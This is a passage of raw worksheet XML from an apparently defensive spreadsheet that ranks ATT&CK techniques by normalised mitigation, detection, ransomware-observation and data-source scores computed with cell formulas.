        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS37" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT37" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU3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0.51640206613756612</v>
      </c>
    </row>
    <row r="38" spans="1:47" ht="68">
      <c r="A38" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B38" s="37">
        <f t="shared" si="0"/>
        <v>71.109549904761906</v>
      </c>
      <c r="C38" s="37" t="s">
        <v>199</v>
      </c>
      <c r="D38" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E38" s="37" t="s">
        <v>200</v>
      </c>
      <c r="F38" s="37">
        <v>1</v>
      </c>
      <c r="G38" s="37">
        <v>1</v>
      </c>
      <c r="H38" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I38" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J38" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K38" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L38" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M38" s="37">
        <v>0</v>
      </c>
      <c r="N38" s="56">
        <v>3</v>
      </c>
      <c r="O38" s="56">
        <v>9</v>
      </c>
      <c r="P38" s="56">
        <v>0</v>
      </c>
      <c r="Q38" s="56">
        <v>6</v>
      </c>
      <c r="R38" s="57" t="s">
        <v>201</v>
      </c>
      <c r="S38" s="57">
        <v>19</v>
      </c>
      <c r="T38" s="57" t="s">
        <v>202</v>
      </c>
      <c r="U38" s="57">
        <v>16</v>
      </c>
      <c r="V38" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.41904780952380954</v>
      </c>
      <c r="W38" s="37">
        <v>35</v>
      </c>
      <c r="X38" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Y38" s="37">
        <v>0.63636400000000004</v>
      </c>
      <c r="Z38" s="37">
        <v>18</v>
      </c>
      <c r="AA38" s="37">
        <v>0.18</v>
      </c>
      <c r="AB38" s="37">
        <v>0.18</v>
      </c>
      <c r="AC38" s="37"/>
      <c r="AD38" s="50" t="s">
        <v>203</v>
      </c>
      <c r="AE38" s="37" t="str" cm="1">
        <f t="array" ref="AE38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD38)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF38" s="37">
        <v>34</v>
      </c>
      <c r="AG38" s="37" t="str" cm="1">
        <f t="array" ref="AG38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD38)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH38" s="37">
        <v>34</v>
      </c>
      <c r="AI38" s="37" t="str" cm="1">
        <f t="array" ref="AI38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD38)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ38" s="37">
        <v>34</v>
      </c>
      <c r="AK38" s="37" t="str" cm="1">
        <f t="array" ref="AK38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD38)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL38" s="37">
        <v>34</v>
      </c>
      <c r="AM38" s="37" t="str" cm="1">
        <f t="array" ref="AM38">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD38)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN38" s="37">
        <v>0</v>
      </c>
      <c r="AO38" s="37">
        <v>0</v>
      </c>
      <c r="AP38" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ38" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.703183301587302</v>
      </c>
      <c r="AR38" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS38" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT38" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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9" spans="1:47" ht="17">
      <c r="A39" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B39" s="37">
        <f t="shared" si="0"/>
        <v>14.100000000000001</v>
      </c>
      <c r="C39" s="37" t="s">
        <v>3767</v>
      </c>
      <c r="D39" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E39" s="37" t="s">
        <v>3768</v>
      </c>
      <c r="F39" s="37">
        <v>1</v>
      </c>
      <c r="G39" s="37">
        <v>1</v>
      </c>
      <c r="H39" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I39" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J39" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K39" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L39" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M39" s="37">
        <v>0</v>
      </c>
      <c r="N39" s="56">
        <v>0</v>
      </c>
      <c r="O39" s="56">
        <v>0</v>
      </c>
      <c r="P39" s="56">
        <v>0</v>
      </c>
      <c r="Q39" s="56">
        <v>0</v>
      </c>
      <c r="R39" s="57"/>
      <c r="S39" s="57"/>
      <c r="T39" s="57"/>
      <c r="U39" s="57"/>
      <c r="V39" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W39" s="37"/>
      <c r="X39" s="37"/>
      <c r="Y39" s="37"/>
      <c r="Z39" s="37"/>
      <c r="AA39" s="37"/>
      <c r="AB39" s="37"/>
      <c r="AC39" s="37"/>
      <c r="AD39" s="50" t="s">
        <v>3769</v>
      </c>
      <c r="AE39" s="37" t="str" cm="1">
        <f t="array" ref="AE39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF39" s="37">
        <v>35</v>
      </c>
      <c r="AG39" s="37" t="str" cm="1">
        <f t="array" ref="AG39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH39" s="37">
        <v>35</v>
      </c>
      <c r="AI39" s="37" t="str" cm="1">
        <f t="array" ref="AI39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD39)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ39" s="37">
        <v>35</v>
      </c>
      <c r="AK39" s="37" t="str" cm="1">
        <f t="array" ref="AK39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL39" s="37">
        <v>35</v>
      </c>
      <c r="AM39" s="37" t="str" cm="1">
        <f t="array" ref="AM39">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD39)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN39" s="37"/>
      <c r="AO39" s="37"/>
      <c r="AP39" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ39" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.7</v>
      </c>
      <c r="AR39" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS39" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT39" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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0" spans="1:47" ht="17">
      <c r="A40" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B40" s="37">
        <f t="shared" si="0"/>
        <v>14.5</v>
      </c>
      <c r="C40" s="37" t="s">
        <v>3770</v>
      </c>
      <c r="D40" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E40" s="37" t="s">
        <v>3771</v>
      </c>
      <c r="F40" s="37">
        <v>1</v>
      </c>
      <c r="G40" s="37">
        <v>1</v>
      </c>
      <c r="H40" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I40" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J40" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K40" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L40" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M40" s="37">
        <v>0</v>
      </c>
      <c r="N40" s="56">
        <v>0</v>
      </c>
      <c r="O40" s="56">
        <v>0</v>
      </c>
      <c r="P40" s="56">
        <v>0</v>
      </c>
      <c r="Q40" s="56">
        <v>0</v>
      </c>
      <c r="R40" s="57"/>
      <c r="S40" s="57"/>
      <c r="T40" s="57"/>
      <c r="U40" s="57"/>
      <c r="V40" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W40" s="37"/>
      <c r="X40" s="37"/>
      <c r="Y40" s="37"/>
      <c r="Z40" s="37"/>
      <c r="AA40" s="37"/>
      <c r="AB40" s="37"/>
      <c r="AC40" s="37"/>
      <c r="AD40" s="50" t="s">
        <v>3769</v>
      </c>
      <c r="AE40" s="37" t="str" cm="1">
        <f t="array" ref="AE40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF40" s="37">
        <v>36</v>
      </c>
      <c r="AG40" s="37" t="str" cm="1">
        <f t="array" ref="AG40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH40" s="37">
        <v>36</v>
      </c>
      <c r="AI40" s="37" t="str" cm="1">
        <f t="array" ref="AI40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD40)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ40" s="37">
        <v>36</v>
      </c>
      <c r="AK40" s="37" t="str" cm="1">
        <f t="array" ref="AK40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL40" s="37">
        <v>36</v>
      </c>
      <c r="AM40" s="37" t="str" cm="1">
        <f t="array" ref="AM40">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD40)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN40" s="37"/>
      <c r="AO40" s="37"/>
      <c r="AP40" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ40" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.833333333333333</v>
      </c>
      <c r="AR40" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS40" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT40" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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1" spans="1:47" ht="17">
      <c r="A41" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B41" s="37">
        <f t="shared" si="0"/>
        <v>36.185693000000001</v>
      </c>
      <c r="C41" s="37" t="s">
        <v>204</v>
      </c>
      <c r="D41" s="50" t="s">
        <v>205</v>
      </c>
      <c r="E41" s="37"/>
      <c r="F41" s="37">
        <v>1</v>
      </c>
      <c r="G41" s="37">
        <v>1</v>
      </c>
      <c r="H41" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I41" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J41" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K41" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L41" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M41" s="37">
        <v>0</v>
      </c>
      <c r="N41" s="56">
        <v>0</v>
      </c>
      <c r="O41" s="56">
        <v>0</v>
      </c>
      <c r="P41" s="56">
        <v>0</v>
      </c>
      <c r="Q41" s="56">
        <v>0</v>
      </c>
      <c r="R41" s="57"/>
      <c r="S41" s="57">
        <v>0</v>
      </c>
      <c r="T41" s="57" t="s">
        <v>206</v>
      </c>
      <c r="U41" s="57">
        <v>15</v>
      </c>
      <c r="V41" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285700000000001</v>
      </c>
      <c r="W41" s="37">
        <v>15</v>
      </c>
      <c r="X41" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y41" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z41" s="37">
        <v>0</v>
      </c>
      <c r="AA41" s="37">
        <v>0</v>
      </c>
      <c r="AB41" s="37">
        <v>0</v>
      </c>
      <c r="AC41" s="37"/>
      <c r="AD41" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE41" s="37" t="str" cm="1">
        <f t="array" ref="AE41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD41)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF41" s="37">
        <v>37</v>
      </c>
      <c r="AG41" s="37" t="str" cm="1">
        <f t="array" ref="AG41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH41" s="37">
        <v>37</v>
      </c>
      <c r="AI41" s="37" t="str" cm="1">
        <f t="array" ref="AI41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD41)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ41" s="37">
        <v>37</v>
      </c>
      <c r="AK41" s="37" t="str" cm="1">
        <f t="array" ref="AK41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL41" s="37">
        <v>37</v>
      </c>
      <c r="AM41" s="37" t="str" cm="1">
        <f t="array" ref="AM41">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD41)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN41" s="37">
        <v>0</v>
      </c>
      <c r="AO41" s="37">
        <v>0</v>
      </c>
      <c r="AP41" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ41" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>12.061897666666667</v>
      </c>
      <c r="AR41" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS41" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT41" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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2" spans="1:47" ht="34">
      <c r="A42" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B42" s="37">
        <f t="shared" si="0"/>
        <v>15.3</v>
      </c>
      <c r="C42" s="37" t="s">
        <v>207</v>
      </c>
      <c r="D42" s="50" t="s">
        <v>208</v>
      </c>
      <c r="E42" s="37"/>
      <c r="F42" s="37">
        <v>1</v>
      </c>
      <c r="G42" s="37">
        <v>1</v>
      </c>
      <c r="H42" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I42" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J42" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K42" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L42" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M42" s="37">
        <v>0</v>
      </c>
      <c r="N42" s="56">
        <v>0</v>
      </c>
      <c r="O42" s="56">
        <v>0</v>
      </c>
      <c r="P42" s="56">
        <v>0</v>
      </c>
      <c r="Q42" s="56">
        <v>0</v>
      </c>
      <c r="R42" s="57"/>
      <c r="S42" s="57">
        <v>0</v>
      </c>
      <c r="T42" s="57"/>
      <c r="U42" s="57">
        <v>0</v>
      </c>
      <c r="V42" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W42" s="37">
        <v>0</v>
      </c>
      <c r="X42" s="37">
        <v>0</v>
      </c>
      <c r="Y42" s="37">
        <v>0</v>
      </c>
      <c r="Z42" s="37">
        <v>0</v>
      </c>
      <c r="AA42" s="37">
        <v>0</v>
      </c>
      <c r="AB42" s="37">
        <v>0</v>
      </c>
      <c r="AC42" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD42" s="50" t="s">
        <v>210</v>
      </c>
      <c r="AE42" s="37" t="str" cm="1">
        <f t="array" ref="AE42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF42" s="37">
        <v>38</v>
      </c>
      <c r="AG42" s="37" t="str" cm="1">
        <f t="array" ref="AG42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD42)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH42" s="37">
        <v>38</v>
      </c>
      <c r="AI42" s="37" t="str" cm="1">
        <f t="array" ref="AI42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD42)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ42" s="37">
        <v>38</v>
      </c>
      <c r="AK42" s="37" t="str" cm="1">
        <f t="array" ref="AK42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD42)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL42" s="37">
        <v>38</v>
      </c>
      <c r="AM42" s="37" t="str" cm="1">
        <f t="array" ref="AM42">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD42)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN42" s="37">
        <v>0</v>
      </c>
      <c r="AO42" s="37"/>
      <c r="AP42" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ42" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.1000000000000005</v>
      </c>
      <c r="AR42" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS42" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT42" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU4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3" spans="1:47" ht="51">
      <c r="A43" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.6333333333333333</v>
      </c>
      <c r="B43" s="37">
        <f t="shared" si="0"/>
        <v>234.60738771428569</v>
      </c>
      <c r="C43" s="37" t="s">
        <v>211</v>
      </c>
      <c r="D43" s="50" t="s">
        <v>212</v>
      </c>
      <c r="E43" s="37"/>
      <c r="F43" s="37">
        <v>2</v>
      </c>
      <c r="G43" s="37">
        <v>1</v>
      </c>
      <c r="H43" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I43" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J43" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K43" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
